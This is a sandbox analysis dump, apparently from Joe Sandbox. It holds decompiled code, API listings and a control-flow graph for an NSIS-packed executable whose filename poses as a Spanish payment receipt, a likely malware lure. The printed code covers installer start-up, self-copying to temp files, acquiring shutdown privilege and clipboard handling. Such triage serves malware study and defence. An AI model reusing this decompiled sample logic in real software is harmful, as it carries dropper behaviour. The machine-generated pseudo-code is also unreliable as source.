                                        				_t193 = L"\"C:\\Users\\Arthur\\Desktop\\rJUSTIFICANTEDEPAGO.exe\"";
                                        				E0040625F(_t193, _t60);
                                        				 *0x7a8a20 = GetModuleHandleW(_t151);
                                        				_t63 = _t193;
                                        				if(L"\"C:\\Users\\Arthur\\Desktop\\rJUSTIFICANTEDEPAGO.exe\"" == 0x22) {
                                        					_t63 =  &M007B3002;
                                        					_t171 = 0x22;
                                        				}
                                        				_t155 = CharNextW(E00405B5D(_t63, _t171));
                                        				 *(_t197 + 0x18) = _t155;
                                        				_t66 =  *_t155;
                                        				if(_t66 == _t151) {
                                        					L33:
                                        					_t172 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
                                        					GetTempPathW(0x400, _t172);
                                        					_t68 = E0040331F(_t155, 0);
                                        					_t225 = _t68;
                                        					if(_t68 != 0) {
                                        						L36:
                                        						DeleteFileW(L"1033"); // executed
                                        						_t70 = E00402EC1(_t227,  *(_t197 + 0x1c)); // executed
                                        						 *(_t197 + 0x10) = _t70;
                                        						if(_t70 != _t151) {
                                        							L48:
                                        							E00403893();
                                        							__imp__OleUninitialize();
                                        							_t239 =  *(_t197 + 0x10) - _t151;
                                        							if( *(_t197 + 0x10) == _t151) {
                                        								__eflags =  *0x7a8ad4 - _t151;
                                        								if( *0x7a8ad4 == _t151) {
                                        									L72:
                                        									_t72 =  *0x7a8aec;
                                        									__eflags = _t72 - 0xffffffff;
                                        									if(_t72 != 0xffffffff) {
                                        										 *(_t197 + 0x10) = _t72;
                                        									}
                                        									ExitProcess( *(_t197 + 0x10));
                                        								}
                                        								_t75 = OpenProcessToken(GetCurrentProcess(), 0x28, _t197 + 0x14);
                                        								__eflags = _t75;
                                        								if(_t75 != 0) {
                                        									LookupPrivilegeValueW(_t151, L"SeShutdownPrivilege", _t197 + 0x20);
                                        									 *(_t197 + 0x34) = 1;
                                        									 *(_t197 + 0x40) = 2;
                                        									AdjustTokenPrivileges( *(_t197 + 0x28), _t151, _t197 + 0x24, _t151, _t151, _t151);
                                        								}
                                        								_t76 = E00406639(4);
                                        								__eflags = _t76 - _t151;
                                        								if(_t76 == _t151) {
                                        									L70:
                                        									_t77 = ExitWindowsEx(2, 0x80040002);
                                        									__eflags = _t77;
                                        									if(_t77 != 0) {
                                        										goto L72;
                                        									}
                                        									goto L71;
                                        								} else {
                                        									_t79 =  *_t76(_t151, _t151, _t151, 0x25, 0x80040002);
                                        									__eflags = _t79;
                                        									if(_t79 == 0) {
                                        										L71:
                                        										E0040140B(9);
                                        										goto L72;
                                        									}
                                        									goto L70;
                                        								}
                                        							}
                                        							E004058C1( *(_t197 + 0x10), 0x200010);
                                        							ExitProcess(2);
                                        						}
                                        						if( *0x7a8a40 == _t151) {
                                        							L47:
                                        							 *0x7a8aec =  *0x7a8aec | 0xffffffff;
                                        							 *(_t197 + 0x14) = E0040396D( *0x7a8aec);
                                        							goto L48;
                                        						}
                                        						_t184 = E00405B5D(_t193, _t151);
                                        						if(_t184 < _t193) {
                                        							L44:
                                        							_t236 = _t184 - _t193;
                                        							 *(_t197 + 0x10) = L"Error launching installer";
                                        							if(_t184 < _t193) {
                                        								_t182 = E0040582C(_t239);
                                        								lstrcatW(_t172, L"~nsu");
                                        								if(_t182 != _t151) {
                                        									lstrcatW(_t172, "A");
                                        								}
                                        								lstrcatW(_t172, L".tmp");
                                        								_t195 = L"C:\\Users\\Arthur\\Desktop";
                                        								if(lstrcmpiW(_t172, L"C:\\Users\\Arthur\\Desktop") != 0) {
                                        									_push(_t172);
                                        									if(_t182 == _t151) {
                                        										E0040580F();
                                        									} else {
                                        										E00405792();
                                        									}
                                        									SetCurrentDirectoryW(_t172);
                                        									_t243 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated" - _t151; // 0x43
                                        									if(_t243 == 0) {
                                        										E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated", _t195);
                                        									}
                                        									E0040625F(0x7a9000,  *(_t197 + 0x18));
                                        									_t156 = "A" & 0x0000ffff;
                                        									 *0x7a9800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                        									_t196 = 0x1a;
                                        									do {
                                        										E00406281(_t151, _t172, 0x79f6e0, 0x79f6e0,  *((intOrPtr*)( *0x7a8a34 + 0x120)));
                                        										DeleteFileW(0x79f6e0);
                                        										if( *(_t197 + 0x10) != _t151 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\rJUSTIFICANTEDEPAGO.exe", 0x79f6e0, ?str?) != 0) {
                                        											E00406025(_t156, 0x79f6e0, _t151);
                                        											E00406281(_t151, _t172, 0x79f6e0, 0x79f6e0,  *((intOrPtr*)( *0x7a8a34 + 0x124)));
                                        											_t103 = E00405844(0x79f6e0);
                                        											if(_t103 != _t151) {
                                        												CloseHandle(_t103);
                                        												 *(_t197 + 0x10) = _t151;
                                        											}
                                        										}
                                        										 *0x7a9800 =  *0x7a9800 + 1;
                                        										_t196 = _t196 - 1;
                                        									} while (_t196 != 0);
                                        									E00406025(_t156, _t172, _t151);
                                        								}
                                        								goto L48;
                                        							}
                                        							 *_t184 = _t151;
                                        							_t185 =  &(_t184[2]);
                                        							if(E00405C38(_t236,  &(_t184[2])) == 0) {
                                        								goto L48;
                                        							}
                                        							E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated", _t185);
                                        							E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated\\Stereoing", _t185);
                                        							 *(_t197 + 0x10) = _t151;
                                        							goto L47;
                                        						}
                                        						asm("cdq");
                                        						asm("cdq");
                                        						asm("cdq");
                                        						_t159 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                        						_t120 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                        						while( *_t184 != _t159 || _t184[1] != _t120) {
                                        							_t184 = _t184;
                                        							if(_t184 >= _t193) {
                                        								continue;
                                        							}
                                        							break;
                                        						}
                                        						_t151 = 0;
                                        						goto L44;
                                        					}
                                        					GetWindowsDirectoryW(_t172, 0x3fb);
                                        					lstrcatW(_t172, L"\\Temp");
                                        					_t123 = E0040331F(_t155, _t225);
                                        					_t226 = _t123;
                                        					if(_t123 != 0) {
                                        						goto L36;
                                        					}
                                        					GetTempPathW(0x3fc, _t172);
                                        					lstrcatW(_t172, L"Low");
                                        					SetEnvironmentVariableW(L"TEMP", _t172);
                                        					SetEnvironmentVariableW(L"TMP", _t172);
                                        					_t128 = E0040331F(_t155, _t226);
                                        					_t227 = _t128;
                                        					if(_t128 == 0) {
                                        						goto L48;
                                        					}
                                        					goto L36;
                                        				} else {
                                        					do {
                                        						_t154 = 0x20;
                                        						if(_t66 != _t154) {
                                        							L13:
                                        							if( *_t155 == 0x22) {
                                        								_t155 = _t155 + 2;
                                        								_t154 = 0x22;
                                        							}
                                        							if( *_t155 != 0x2f) {
                                        								goto L27;
                                        							} else {
                                        								_t155 = _t155 + 2;
                                        								if( *_t155 == 0x53) {
                                        									_t148 =  *((intOrPtr*)(_t155 + 2));
                                        									if(_t148 == 0x20 || _t148 == 0) {
                                        										 *0x7a8ae0 = 1;
                                        									}
                                        								}
                                        								asm("cdq");
                                        								asm("cdq");
                                        								_t169 = L"NCRC" & 0x0000ffff;
                                        								asm("cdq");
                                        								_t175 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t169;
                                        								if( *_t155 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
                                        									_t147 =  *((intOrPtr*)(_t155 + 8));
                                        									if(_t147 == 0x20 || _t147 == 0) {
                                        										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
                                        									}
                                        								}
                                        								asm("cdq");
                                        								asm("cdq");
                                        								_t164 = L" /D=" & 0x0000ffff;
                                        								asm("cdq");
                                        								_t178 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t164;
                                        								if( *(_t155 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
                                        									goto L27;
                                        								} else {
                                        									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
                                        									__eflags = _t155;
                                        									E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated", _t155);
                                        									L32:
                                        									_t151 = 0;
                                        									goto L33;
                                        								}
                                        							}
                                        						} else {
                                        							goto L12;
                                        						}
                                        						do {
                                        							L12:
                                        							_t155 = _t155 + 2;
                                        						} while ( *_t155 == _t154);
                                        						goto L13;
                                        						L27:
                                        						_t155 = E00405B5D(_t155, _t154);
                                        						if( *_t155 == 0x22) {
                                        							_t155 = _t155 + 2;
                                        						}
                                        						_t66 =  *_t155;
                                        					} while (_t66 != 0);
                                        					goto L32;
                                        				}
                                        				L4:
                                        				E004065C9(_t179); // executed
                                        				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
                                        				if( *_t179 != 0) {
                                        					goto L4;
                                        				} else {
                                        					E00406639(0xa);
                                        					 *0x7a8a24 = E00406639(8);
                                        					_t56 = E00406639(6);
                                        					if(_t56 != _t151) {
                                        						_t56 =  *_t56(0x1e);
                                        						if(_t56 != 0) {
                                        							 *0x7a8a2f =  *0x7a8a2f | 0x00000040;
                                        						}
                                        					}
                                        					goto L8;
                                        				}
                                        			}








































                                        0x0040335b
                                        0x0040335c
                                        0x00403363
                                        0x00403367
                                        0x0040336f
                                        0x00403373
                                        0x0040337f
                                        0x00403388
                                        0x0040338d
                                        0x00403390
                                        0x00403397
                                        0x0040339e
                                        0x0040339e
                                        0x00403397
                                        0x004033a0
                                        0x004033a0
                                        0x004033e8
                                        0x004033e9
                                        0x004033f0
                                        0x004033f6
                                        0x0040340c
                                        0x0040341c
                                        0x00403421
                                        0x00403427
                                        0x0040342e
                                        0x00403442
                                        0x00403447
                                        0x00403449
                                        0x0040344d
                                        0x00403452
                                        0x00403452
                                        0x00403461
                                        0x00403463
                                        0x00403467
                                        0x0040346d
                                        0x00403584
                                        0x0040358a
                                        0x00403595
                                        0x00403597
                                        0x0040359c
                                        0x0040359e
                                        0x004035f6
                                        0x004035fb
                                        0x00403605
                                        0x0040360c
                                        0x00403610
                                        0x004036c1
                                        0x004036c1
                                        0x004036c6
                                        0x004036cc
                                        0x004036d1
                                        0x004037f7
                                        0x004037fd
                                        0x0040387b
                                        0x0040387b
                                        0x00403880
                                        0x00403883
                                        0x00403885
                                        0x00403885
                                        0x0040388d
                                        0x0040388d
                                        0x0040380d
                                        0x00403813
                                        0x00403815
                                        0x00403822
                                        0x00403835
                                        0x0040383d
                                        0x00403845
                                        0x00403845
                                        0x0040384d
                                        0x00403852
                                        0x00403859
                                        0x00403867
                                        0x0040386a
                                        0x00403870
                                        0x00403872
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040385b
                                        0x00403861
                                        0x00403863
                                        0x00403865
                                        0x00403874
                                        0x00403876
                                        0x00000000
                                        0x00403876
                                        0x00000000
                                        0x00403865
                                        0x00403859
                                        0x004036e0
                                        0x004036e7
                                        0x004036e7
                                        0x0040361c
                                        0x004036b1
                                        0x004036b1
                                        0x004036bd
                                        0x00000000
                                        0x004036bd
                                        0x00403629
                                        0x0040362d
                                        0x0040367b
                                        0x0040367b
                                        0x0040367d
                                        0x00403685
                                        0x004036f8
                                        0x004036fa
                                        0x00403701
                                        0x00403709
                                        0x00403709
                                        0x00403714
                                        0x00403719
                                        0x00403728
                                        0x0040372c
                                        0x0040372d
                                        0x00403736
                                        0x0040372f
                                        0x0040372f
                                        0x0040372f
                                        0x0040373c
                                        0x00403742
                                        0x00403749
                                        0x00403751
                                        0x00403751
                                        0x0040375f
                                        0x0040376b
                                        0x00403779
                                        0x0040377e
                                        0x00403784
                                        0x00403790
                                        0x00403796
                                        0x004037a0
                                        0x004037b6
                                        0x004037c7
                                        0x004037cd
                                        0x004037d4
                                        0x004037d7
                                        0x004037dd
                                        0x004037dd
                                        0x004037d4
                                        0x004037e1
                                        0x004037e8
                                        0x004037e8
                                        0x004037ed
                                        0x004037ed
                                        0x00000000
                                        0x00403728
                                        0x00403687
                                        0x0040368a
                                        0x00403695
                                        0x00000000
                                        0x00000000
                                        0x0040369d
                                        0x004036a8
                                        0x004036ad
                                        0x00000000
                                        0x004036ad
                                        0x00403636
                                        0x0040364e
                                        0x0040365f
                                        0x00403660
                                        0x00403664
                                        0x00403666
                                        0x00403674
                                        0x00403677
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403677
                                        0x00403679
                                        0x00000000
                                        0x00403679
                                        0x004035a6
                                        0x004035b2
                                        0x004035b7
                                        0x004035bc
                                        0x004035be
                                        0x00000000
                                        0x00000000
                                        0x004035c6
                                        0x004035ce
                                        0x004035df
                                        0x004035e7
                                        0x004035e9
                                        0x004035ee
                                        0x004035f0
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00403473
                                        0x00403473
                                        0x00403475
                                        0x00403479
                                        0x00403482
                                        0x00403486
                                        0x0040348b
                                        0x0040348c
                                        0x0040348c
                                        0x00403491
                                        0x00000000
                                        0x00403497
                                        0x00403498
                                        0x0040349d
                                        0x0040349f
                                        0x004034a7
                                        0x004034ae
                                        0x004034ae
                                        0x004034a7
                                        0x004034bf
                                        0x004034d2
                                        0x004034d3
                                        0x004034e8
                                        0x004034ed
                                        0x004034f1
                                        0x004034fa
                                        0x00403502
                                        0x00403509
                                        0x00403509
                                        0x00403502
                                        0x00403515
                                        0x00403528
                                        0x00403529
                                        0x0040353e
                                        0x00403544
                                        0x00403548
                                        0x00000000
                                        0x0040356f
                                        0x0040356f
                                        0x00403574
                                        0x0040357d
                                        0x00403582
                                        0x00403582
                                        0x00000000
                                        0x00403582
                                        0x00403548
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x0040347b
                                        0x0040347b
                                        0x0040347c
                                        0x0040347d
                                        0x00000000
                                        0x00403550
                                        0x00403557
                                        0x0040355d
                                        0x00403560
                                        0x00403560
                                        0x00403561
                                        0x00403564
                                        0x00000000
                                        0x0040356d
                                        0x004033a5
                                        0x004033a6
                                        0x004033b2
                                        0x004033b9
                                        0x00000000
                                        0x004033bb
                                        0x004033bd
                                        0x004033cb
                                        0x004033d0
                                        0x004033d7
                                        0x004033db
                                        0x004033df
                                        0x004033e1
                                        0x004033e1
                                        0x004033df
                                        0x00000000
                                        0x004033d7

                                        APIs
                                        • SetErrorMode.KERNELBASE ref: 00403373
                                        • GetVersion.KERNEL32 ref: 00403379
                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033AC
                                        • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033E9
                                        • OleInitialize.OLE32(00000000), ref: 004033F0
                                        • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 0040340C
                                        • GetCommandLineW.KERNEL32(Blass Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403421
                                        • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe",00000000,?,00000006,00000008,0000000A), ref: 00403434
                                        • CharNextW.USER32(00000000,"C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe",00000020,?,00000006,00000008,0000000A), ref: 0040345B
                                          • Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
                                          • Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403595
                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035A6
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035B2
                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035C6
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035CE
                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035DF
                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035E7
                                        • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035FB
                                          • Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,Blass Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C
                                        • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036C6
                                        • ExitProcess.KERNEL32 ref: 004036E7
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004036FA
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403709
                                        • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403714
                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403720
                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373C
                                        • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 00403796
                                        • CopyFileW.KERNEL32(C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe,0079F6E0,?,?,00000006,00000008,0000000A), ref: 004037AA
                                        • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037D7
                                        • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403806
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 0040380D
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403822
                                        • AdjustTokenPrivileges.ADVAPI32 ref: 00403845
                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 0040386A
                                        • ExitProcess.KERNEL32 ref: 0040388D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                        • String ID: "C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe"$.tmp$1033$Blass Setup$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated$C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated\Stereoing$C:\Users\user\Desktop$C:\Users\user\Desktop\rJUSTIFICANTEDEPAGO.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                        • API String ID: 2488574733-3620489167
                                        • Opcode ID: 50ce3784074dcbd526eb1f42df312bf4ec451fb13847cd92a6110888af3a5c2d
                                        • Instruction ID: f8b53dcf82f20274bbdd851e6e7f34b77cfd1224ece1df9e86175f3a8edd883a
                                        • Opcode Fuzzy Hash: 50ce3784074dcbd526eb1f42df312bf4ec451fb13847cd92a6110888af3a5c2d
                                        • Instruction Fuzzy Hash: CED11371500310AAD7207F759D85B3B3AACEB41746F00493FF981B62E2DB7D8A458B6E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 139 405402-40541d 140 405423-4054ea GetDlgItem * 3 call 404229 call 404b60 GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 4055ac-4055b3 139->141 159 405508-40550b 140->159 160 4054ec-405506 SendMessageW * 2 140->160 143 4055b5-4055d7 GetDlgItem CreateThread CloseHandle 141->143 144 4055dd-4055ea 141->144 143->144 146 405608-405612 144->146 147 4055ec-4055f2 144->147 151 405614-40561a 146->151 152 405668-40566c 146->152 149 4055f4-405603 ShowWindow * 2 call 404229 147->149 150 40562d-405636 call 40425b 147->150 149->146 163 40563b-40563f 150->163 156 405642-405652 ShowWindow 151->156 157 40561c-405628 call 4041cd 151->157 152->150 154 40566e-405674 152->154 154->150 161 405676-405689 SendMessageW 154->161 164 405662-405663 call 4041cd 156->164 165 405654-40565d call 4052c3 156->165 157->150 168 40551b-405532 call 4041f4 159->168 169 40550d-405519 SendMessageW 159->169 160->159 170 40578b-40578d 161->170 171 40568f-4056ba CreatePopupMenu call 406281 AppendMenuW 161->171 164->152 165->164 178 405534-405548 ShowWindow 168->178 179 405568-405589 GetDlgItem SendMessageW 168->179 169->168 170->163 176 4056bc-4056cc GetWindowRect 171->176 177 4056cf-4056e4 TrackPopupMenu 171->177 176->177 177->170 181 4056ea-405701 177->181 182 405557 178->182 183 40554a-405555 ShowWindow 178->183 179->170 180 40558f-4055a7 SendMessageW * 2 179->180 180->170 184 405706-405721 SendMessageW 181->184 185 40555d-405563 call 404229 182->185 183->185 184->184 186 405723-405746 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 405748-40576f SendMessageW 186->188 188->188 189 405771-405785 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                        C-Code - Quality: 96%
                                        			E00405402(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                        				struct HWND__* _v8;
                                        				long _v12;
                                        				struct tagRECT _v28;
                                        				void* _v36;
                                        				signed int _v40;
                                        				int _v44;
                                        				int _v48;
                                        				signed int _v52;
                                        				int _v56;
                                        				void* _v60;
                                        				void* _v68;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				struct HWND__* _t94;
                                        				long _t95;
                                        				int _t100;
                                        				int _t101;
                                        				long _t104;
                                        				void* _t108;
                                        				intOrPtr _t119;
                                        				void* _t127;
                                        				intOrPtr _t130;
                                        				struct HWND__* _t134;
                                        				int _t156;
                                        				int _t159;
                                        				struct HMENU__* _t164;
                                        				struct HWND__* _t168;
                                        				struct HWND__* _t169;
                                        				int _t171;
                                        				void* _t172;
                                        				short* _t173;
                                        				short* _t175;
                                        				int _t177;
                                        
                                        				_t169 =  *0x7a7a04; // 0x1038a
                                        				_t156 = 0;
                                        				_v8 = _t169;
                                        				if(_a8 != 0x110) {
                                        					__eflags = _a8 - 0x405;
                                        					if(_a8 == 0x405) {
                                        						_t127 = CreateThread(0, 0, E00405396, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                        						CloseHandle(_t127); // executed
                                        					}
                                        					__eflags = _a8 - 0x111;
                                        					if(_a8 != 0x111) {
                                        						L17:
                                        						_t171 = 1;
                                        						__eflags = _a8 - 0x404;
                                        						if(_a8 != 0x404) {
                                        							L25:
                                        							__eflags = _a8 - 0x7b;
                                        							if(_a8 != 0x7b) {
                                        								goto L20;
                                        							}
                                        							_t94 = _v8;
                                        							__eflags = _a12 - _t94;
                                        							if(_a12 != _t94) {
                                        								goto L20;
                                        							}
                                        							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                        							__eflags = _t95 - _t156;
                                        							_a8 = _t95;
                                        							if(_t95 <= _t156) {
                                        								L36:
                                        								return 0;
                                        							}
                                        							_t164 = CreatePopupMenu();
                                        							AppendMenuW(_t164, _t156, _t171, E00406281(_t156, _t164, _t171, _t156, 0xffffffe1));
                                        							_t100 = _a16;
                                        							__eflags = _a16 - 0xffffffff;
                                        							_t159 = _a16 >> 0x10;
                                        							if(_a16 == 0xffffffff) {
                                        								GetWindowRect(_v8,  &_v28);
                                        								_t100 = _v28.left;
                                        								_t159 = _v28.top;
                                        							}
                                        							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
                                        							__eflags = _t101 - _t171;
                                        							if(_t101 == _t171) {
                                        								_v60 = _t156;
                                        								_v48 = 0x7a1f20;
                                        								_v44 = 0x1000;
                                        								_a4 = _a8;
                                        								do {
                                        									_a4 = _a4 - 1;
                                        									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
                                        									__eflags = _a4 - _t156;
                                        									_t171 = _t171 + _t104 + 2;
                                        								} while (_a4 != _t156);
                                        								OpenClipboard(_t156);
                                        								EmptyClipboard();
                                        								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                        								_a4 = _t108;
                                        								_t172 = GlobalLock(_t108);
                                        								do {
                                        									_v48 = _t172;
                                        									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                        									 *_t173 = 0xd;
                                        									_t175 = _t173 + 2;
                                        									 *_t175 = 0xa;
                                        									_t172 = _t175 + 2;
                                        									_t156 = _t156 + 1;
                                        									__eflags = _t156 - _a8;
                                        								} while (_t156 < _a8);
                                        								GlobalUnlock(_a4);
                                        								SetClipboardData(0xd, _a4);
                                        								CloseClipboard();
                                        							}
                                        							goto L36;
                                        						}
                                        						__eflags =  *0x7a79ec - _t156; // 0x0
                                        						if(__eflags == 0) {
                                        							ShowWindow( *0x7a8a28, 8);
                                        							__eflags =  *0x7a8acc - _t156;
                                        							if( *0x7a8acc == _t156) {
                                        								_t119 =  *0x7a0ef8; // 0x87e0fc
                                        								_t57 = _t119 + 0x34; // 0xffffffd5
                                        								E004052C3( *_t57, _t156);
                                        							}
                                        							E004041CD(_t171);
                                        							goto L25;
                                        						}
                                        						 *0x7a06f0 = 2;
                                        						E004041CD(0x78);
                                        						goto L20;
                                        					} else {
                                        						__eflags = _a12 - 0x403;
                                        						if(_a12 != 0x403) {
                                        							L20:
                                        							return E0040425B(_a8, _a12, _a16);
                                        						}
                                        						ShowWindow( *0x7a79f0, _t156);
                                        						ShowWindow(_t169, 8);
                                        						E00404229(_t169);
                                        						goto L17;
                                        					}
                                        				}
                                        				_v52 = _v52 | 0xffffffff;
                                        				_v40 = _v40 | 0xffffffff;
                                        				_t177 = 2;
                                        				_v60 = _t177;
                                        				_v56 = 0;
                                        				_v48 = 0;
                                        				_v44 = 0;
                                        				asm("stosd");
                                        				asm("stosd");
                                        				_t130 =  *0x7a8a34;
                                        				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                        				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                        				 *0x7a79f0 = GetDlgItem(_a4, 0x403);
                                        				 *0x7a79e8 = GetDlgItem(_a4, 0x3ee);
                                        				_t134 = GetDlgItem(_a4, 0x3f8);
                                        				 *0x7a7a04 = _t134;
                                        				_v8 = _t134;
                                        				E00404229( *0x7a79f0);
                                        				 *0x7a79f4 = E00404B60(4);
                                        				 *0x7a7a0c = 0;
                                        				GetClientRect(_v8,  &_v28);
                                        				_v52 = _v28.right - GetSystemMetrics(_t177);
